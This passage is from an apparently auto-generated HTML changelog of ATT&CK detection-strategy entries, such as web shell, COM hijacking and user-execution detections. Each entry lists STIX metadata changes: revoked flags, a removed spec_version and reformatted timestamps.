16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0525] System Discovery via Native and Remote Utilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0447] T1136.001 Detection Strategy - Local Account Creation Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0003] T1136.002 Detection Strategy - Domain Account Creation Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0534] TCC Database Manipulation via Launchctl and Unprotected SIP</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0566] Template Injection Detection - Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0524] Traffic Signaling (Port-knock / magic-packet → firewall or service activation) – T1205</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0351] Unix-like File Permission Manipulation Behavioral Chain Detection Strategy</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0340] User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0294] User Execution – Malicious File via download/open → spawn chain (T1204.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0248] User Execution – Malicious Image (containers & IaaS) – pull/run → start → anomalous behavior (T1204.003)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0066] User Execution – Malicious Link (click → suspicious egress → download/write → follow-on activity)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details><hr><h4>[DET0478] User Execution – multi-surface behavior chain (documents/links → helper/unpacker → LOLBIN/child → egress)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0252] User-Initiated Malicious Library Installation via Package Manager (T1204.005)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0168] Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0394] Web Shell Detection via Server Behavior and File Execution Chains</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0481] Windows COM Hijacking Detection via Registry and DLL Load Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid 